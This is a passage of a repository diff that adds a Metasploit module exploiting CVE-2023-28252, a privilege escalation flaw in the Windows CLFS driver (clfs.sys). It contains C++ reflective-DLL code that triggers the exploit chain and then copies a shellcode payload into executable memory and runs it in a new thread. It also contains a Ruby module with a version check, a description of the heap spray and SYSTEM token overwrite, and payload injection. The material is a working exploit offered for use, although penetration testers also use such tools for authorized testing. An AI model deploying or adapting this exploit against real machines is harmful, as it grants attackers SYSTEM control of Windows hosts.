for (size_t j = 0; j < 8; j++)
|
||||
{
|
||||
if (c & 1) {
|
||||
c = polynomial ^ (c >> 1);
|
||||
}
|
||||
else {
|
||||
c >>= 1;
|
||||
}
|
||||
}
|
||||
table[i] = c;
|
||||
}
|
||||
}
|
||||
|
||||
static uint32_t update(uint32_t(&table)[256], uint32_t initial, const void* buf, size_t len)
|
||||
{
|
||||
uint32_t c = initial ^ 0xFFFFFFFF;
|
||||
const uint8_t* u = static_cast<const uint8_t*>(buf);
|
||||
for (size_t i = 0; i < len; ++i)
|
||||
{
|
||||
c = table[(c ^ u[i]) & 0xFF] ^ (c >> 8);
|
||||
}
|
||||
return c ^ 0xFFFFFFFF;
|
||||
}
|
||||
};
|
||||
|
||||
|
||||
// usage: the following code generates crc for 2 pieces of data
|
||||
// uint32_t table[256];
|
||||
// crc32::generate_table(table);
|
||||
// uint32_t crc = crc32::update(table, 0, data_piece1, len1);
|
||||
// crc = crc32::update(table, crc, data_piece2, len2);
|
||||
// output(crc);
|
44
external/source/exploits/CVE-2023-28252/CVE-2023-28252/dllmain.cpp
vendored
Executable file
44
external/source/exploits/CVE-2023-28252/CVE-2023-28252/dllmain.cpp
vendored
Executable file
@ -0,0 +1,44 @@
|
||||
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
||||
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
||||
#define DEBUGTRACE 1
|
||||
|
||||
#include "ReflectiveLoader.c"
|
||||
#include "definitions.h"
|
||||
#include "common.h"
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdint.h>
|
||||
#include <windows.h>
|
||||
|
||||
DWORD Exploit(PMSF_PAYLOAD pPayload);
|
||||
|
||||
void main(PMSF_PAYLOAD lpReserved) {
|
||||
dprintf("In dllmain main method, heading to exploit method");
|
||||
Exploit(lpReserved);
|
||||
return;
|
||||
}
|
||||
|
||||
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
|
||||
{
|
||||
PMSF_PAYLOAD payload = (PMSF_PAYLOAD)lpReserved;
|
||||
switch (dwReason)
|
||||
{
|
||||
case DLL_QUERY_HMODULE:
|
||||
hAppInstance = hinstDLL;
|
||||
if (lpReserved != NULL)
|
||||
{
|
||||
*(HMODULE*)lpReserved = hAppInstance;
|
||||
}
|
||||
break;
|
||||
case DLL_PROCESS_ATTACH:
|
||||
hAppInstance = hinstDLL;
|
||||
main(payload);
|
||||
break;
|
||||
case DLL_PROCESS_DETACH:
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
break;
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
|
66
external/source/exploits/CVE-2023-28252/CVE-2023-28252/exploit.cpp
vendored
Executable file
66
external/source/exploits/CVE-2023-28252/CVE-2023-28252/exploit.cpp
vendored
Executable file
@ -0,0 +1,66 @@
|
||||
#pragma once
|
||||
#include "common.h"
|
||||
#include "clfs_eop.h"
|
||||
#include "exploit.h"
|
||||
#include <tchar.h>
|
||||
|
||||
void ExecutePayload(PMSF_PAYLOAD pMsfPayload) {
|
||||
PVOID pPayload = VirtualAlloc(NULL, pMsfPayload->dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (!pPayload) {
|
||||
exit;
|
||||
}
|
||||
|
||||
CopyMemory(pPayload, &pMsfPayload->cPayloadData, pMsfPayload->dwSize);
|
||||
|
||||
// Get the current process token
|
||||
HANDLE hToken;
|
||||
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_DUPLICATE, &hToken)) {
|
||||
VirtualFree(pPayload, 0, MEM_RELEASE); // Clean up allocated memory
|
||||
exit;
|
||||
}
|
||||
|
||||
// Duplicate the token
|
||||
HANDLE hDupToken;
|
||||
if (!DuplicateToken(hToken, SecurityImpersonation, &hDupToken)) {
|
||||
CloseHandle(hToken);
|
||||
VirtualFree(pPayload, 0, MEM_RELEASE); // Clean up allocated memory
|
||||
exit;
|
||||
}
|
||||
|
||||
// Close the original token handle
|
||||
CloseHandle(hToken);
|
||||
|
||||
// Create thread to execute payload code
|
||||
HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)pPayload, NULL, 0, NULL);
|
||||
if (!hThread) {
|
||||
// Handle thread creation error
|
||||
CloseHandle(hDupToken);
|
||||
VirtualFree(pPayload, 0, MEM_RELEASE); // Clean up allocated memory
|
||||
exit;
|
||||
}
|
||||
|
||||
// Wait for the thread to finish if needed
|
||||
WaitForSingleObject(hThread, INFINITE);
|
||||
|
||||
// Clean up handles and allocated memory
|
||||
CloseHandle(hThread);
|
||||
CloseHandle(hDupToken);
|
||||
VirtualFree(pPayload, 0, MEM_RELEASE);
|
||||
}
|
||||
|
||||
|
||||
DWORD Exploit(PMSF_PAYLOAD pPayload) {
|
||||
|
||||
clfs_eop ce = clfs_eop::clfs_eop();
|
||||
|
||||
ce.getVirtualAddress();
|
||||
ce.InitEnvironment();
|
||||
ce.doFirstAlloc();
|
||||
ce.createInitialLogFile();
|
||||
ce.fun_prepare();
|
||||
ce.to_trigger();
|
||||
|
||||
ExecutePayload(pPayload);
|
||||
|
||||
return 0;
|
||||
}
|
121
external/source/exploits/CVE-2023-28252/CVE-2023-28252/exploit.h
vendored
Executable file
121
external/source/exploits/CVE-2023-28252/CVE-2023-28252/exploit.h
vendored
Executable file
@ -0,0 +1,121 @@
|
||||
#pragma once
|
||||
#include <Windows.h>
|
||||
|
||||
#pragma once
|
||||
#include "ntos.h"
|
||||
|
||||
#include <windows.h>
|
||||
#include <ntstatus.h>
|
||||
|
||||
#ifndef NTSTATUS
|
||||
typedef long NTSTATUS;
|
||||
#endif
|
||||
|
||||
typedef NTSTATUS(__stdcall* fNtQuerySystemInformation)(
|
||||
SYSTEM_INFORMATION_CLASS SystemInformationClass,
|
||||
PVOID SystemInformation,
|
||||
ULONG SystemInformationLength,
|
||||
PULONG ReturnLength
|
||||
);
|
||||
|
||||
typedef NTSTATUS(__stdcall* fNtCallbackReturn)(
|
||||
PVOID Result,
|
||||
ULONG ResultLength,
|
||||
NTSTATUS CallbackStateus
|
||||
);
|
||||
|
||||
typedef NTSTATUS(__stdcall* fNtUserConsoleControl)(
|
||||
DWORD ConsoleCtrl,
|
||||
PVOID ConsoleCtrlInfo,
|
||||
ULONG ConsoleCtrlInfoLength
|
||||
);
|
||||
|
||||
typedef NTSTATUS(__stdcall* fNtUserMessageCall)(
|
||||
HWND hWnd,
|
||||
UINT msg,
|
||||
WPARAM wParam,
|
||||
LPARAM lParam,
|
||||
ULONG_PTR ResultInfo,
|
||||
DWORD dwType,
|
||||
BOOL bAscii
|
||||
);
|
||||
|
||||
typedef PVOID(__stdcall* fRtlAllocateHeap)(
|
||||
PVOID HeapHandle,
|
||||
ULONG Flags,
|
||||
SIZE_T Size
|
||||
);
|
||||
|
||||
typedef VOID(__stdcall* fRtlGetNtVersionNumbers)(
|
||||
DWORD* MajorVersion,
|
||||
DWORD* MinorVersion,
|
||||
DWORD* BuildNumber
|
||||
);
|
||||
|
||||
#define TYPE_WINDOW 1
|
||||
typedef PVOID(__stdcall* fHMValidateHandle)(HANDLE hHandle, DWORD dwType);
|
||||
|
||||
//
|
||||
// Taken from ntdef.h
|
||||
//
|
||||
|
||||
|
||||
|
||||
//
|
||||
// Taken from wdm.h
|
||||
//
|
||||
|
||||
typedef NTSTATUS(__stdcall* fNtQuerySystemInformation)(
|
||||
SYSTEM_INFORMATION_CLASS SystemInformationClass,
|
||||
PVOID SystemInformation,
|
||||
ULONG SystemInformationLength,
|
||||
PULONG ReturnLength
|
||||
);
|
||||
|
||||
typedef NTSTATUS(__stdcall* fNtCreateFile)(
|
||||
PHANDLE FileHandle,
|
||||
ACCESS_MASK DesiredAccess,
|
||||
POBJECT_ATTRIBUTES ObjectAttributes,
|
||||
PIO_STATUS_BLOCK IoStatusBlock,
|
||||
PLARGE_INTEGER AllocationSize,
|
||||
ULONG FileAttributes,
|
||||
ULONG ShareAccess,
|
||||
ULONG CreateDisposition,
|
||||
ULONG CreateOptions,
|
||||
PVOID EaBuffer,
|
||||
ULONG EaLength
|
||||
);
|
||||
|
||||
typedef NTSTATUS(__stdcall* fNtDeviceIoControlFile)(
|
||||
HANDLE FileHandle,
|
||||
HANDLE Event,
|
||||
PVOID ApcRoutine, // PIO_APC_ROUTINE is just a pointer to a function
|
||||
PVOID ApcContext,
|
||||
PIO_STATUS_BLOCK IoStatusBlock,
|
||||
ULONG IoControlCode,
|
||||
PVOID InputBuffer,
|
||||
ULONG InputBufferLength,
|
||||
PVOID OutputBuffer,
|
||||
ULONG OutputBufferLength
|
||||
);
|
||||
|
||||
typedef NTSTATUS(__stdcall* fNtCreateIoCompletion)(
|
||||
PHANDLE IoCompletionHandle,
|
||||
ACCESS_MASK DesiredAccess,
|
||||
POBJECT_ATTRIBUTES ObjectAttributes,
|
||||
ULONG NumberOfConcurrentThreads
|
||||
);
|
||||
|
||||
typedef NTSTATUS(__stdcall* fNtSetIoCompletion)(
|
||||
HANDLE IoCompletionHandle,
|
||||
ULONG CompletionKey,
|
||||
PIO_STATUS_BLOCK IoStatusBlock,
|
||||
NTSTATUS CompletionStatus,
|
||||
ULONG NumberOfBytesTransferred
|
||||
);
|
||||
|
||||
|
||||
class exploit {
|
||||
public:
|
||||
DWORD Exploit(PVOID pPayload);
|
||||
};
|
6455
external/source/exploits/CVE-2023-28252/CVE-2023-28252/ntos.h
vendored
Executable file
6455
external/source/exploits/CVE-2023-28252/CVE-2023-28252/ntos.h
vendored
Executable file
File diff suppressed because it is too large
Load Diff
BIN
external/source/exploits/CVE-2023-28252/CVE-2023-28252/ntoskrnl.lib
vendored
Executable file
BIN
external/source/exploits/CVE-2023-28252/CVE-2023-28252/ntoskrnl.lib
vendored
Executable file
Binary file not shown.
126
modules/exploits/windows/local/cve_2023_28252_clfs_driver.rb
Normal file
126
modules/exploits/windows/local/cve_2023_28252_clfs_driver.rb
Normal file
@ -0,0 +1,126 @@
|
||||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Local::WindowsKernel
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::Process
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
include Msf::Post::Windows::Version
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
{
|
||||
'Name' => 'Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability',
|
||||
'Description' => %q{
|
||||
A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on
|
||||
Windows 10 21H2, Windows 11 21H2 and Windows Server 20348 operating systems.
|
||||
|
||||
The clfs.sys driver contains a function CreateLogFile that is used to create
|
||||
open and edit '*.blf' (base log format) files. Inside a .blf file there are multiple blocks of data which
|
||||
contain checksums to verify the integrity of the .blf file and to ensure the file looks and acts like a
|
||||
.blf file. However, these files can be edited with CreateFileA or with fopen and then modified with
|
||||
WriteFile or fwrite respectively in order to change the contents of the file and update their checksums accordingly.
|
||||
|
||||
This exploit makes use to two different kinds of specially crafted .blf files that are edited using the technique
|
||||
mentioned above. There are multiple spray .blf files. The spray .blf files are specially crafted to initiate an out of
|
||||
bounds read which reads from a contiguous block of memory. The block of memory it reads from contains a read-write pipe
|
||||
that points to the address of the second type of .blf file - the trigger .blf file. The trigger .blf file is specially
|
||||
crafted read the SYSTEM token and write it in the process of the exploit to achieve the local privilege escalation.
|
||||
|
||||
The exploits creates a controlled memory space by first looping over the CreatePipe function to
|
||||
to create thousands of read-write pipes (which take up 0x90 bytes of memory). It then releases a certain number of
|
||||
pipes from memory and calls CreateLogFile to open the pre-existing spray .blf files which when being opened fill the
|
||||
0x90 byte gaps created by the deallocation of the pipes in memory, creating the controlled memory space.
|
||||
|
||||
This is a very brief and high overview description of what the exploit is actually doing. For a more detailed and in
|
||||
depth analysis please refer to the following [reference](https://github.com/fortra/CVE-2023-28252).
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Ricardo Narvaja', # Original PoC (@ricnar456)
|
||||
'Esteban.kazimirow', # Original PoC (@solidclt)
|
||||
'jheysel-r7' # msf module
|
||||
],
|
||||
'Arch' => [ ARCH_X64 ],
|
||||
'Platform' => 'win',
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
'DefaultOptions' => {
|
||||
'EXITFUNC' => 'thread'
|
||||
},
|
||||
'Targets' => [
|
||||
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
|
||||
],
|
||||
'References' => [
|
||||
[ 'CVE', '2023-28252' ],
|
||||
[ 'URL', 'https://github.com/fortra/CVE-2023-28252' ]
|
||||
],
|
||||
'DisclosureDate' => '2023-04-11',
|
||||
'DefaultTarget' => 0,
|
||||
'Privileged' => true,
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SAFE],
|
||||
'Reliability' => [UNRELIABLE_SESSION], # Should always return a session on the first run but after that a session is not guaranteed
|
||||
'SideEffects' => []
|
||||
},
|
||||
'Compat' => {
|
||||
'Meterpreter' => {
|
||||
'Commands' => %w[
|
||||
stdapi_railgun_api
|
||||
]
|
||||
}
|
||||
}
|
||||
}
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
unless session.platform == 'windows'
|
||||
# Non-Windows systems are definitely not affected.
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
file_path = get_env('WINDIR') + '\\system32\\drivers\\clfs.sys'
|
||||
unless file?(file_path)
|
||||
return Exploit::CheckCode::Safe('The target system does not have clfs.sys in system32\\drivers\\')
|
||||
end
|
||||
|
||||
version = get_version_info
|
||||
if version.build_number.between?(Msf::WindowsVersion::Win10_20H2, Msf::WindowsVersion::Win10_21H2) || version.build_number == Msf::WindowsVersion::Win11_21H2 || version.build_number == Msf::WindowsVersion::Server2022
|
||||
return CheckCode::Appears("The target is running windows version: #{version.build_number} which has a vulnerable version of clfs.sys installed by default")
|
||||
end
|
||||
|
||||
CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
if is_system?
|
||||
fail_with(Failure::None, 'Session is already elevated')
|
||||
end
|
||||
|
||||
if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
|
||||
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
|
||||
elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
|
||||
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
|
||||
elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
|
||||
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
|
||||
end
|
||||
|
||||
encoded_payload = payload.encoded
|
||||
execute_dll(
|
||||
::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-28252', 'CVE-2023-28252.x64.dll'),
|
||||
[encoded_payload.length].pack('I<') + encoded_payload
|
||||
)
|
||||
|
||||
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue
Block a user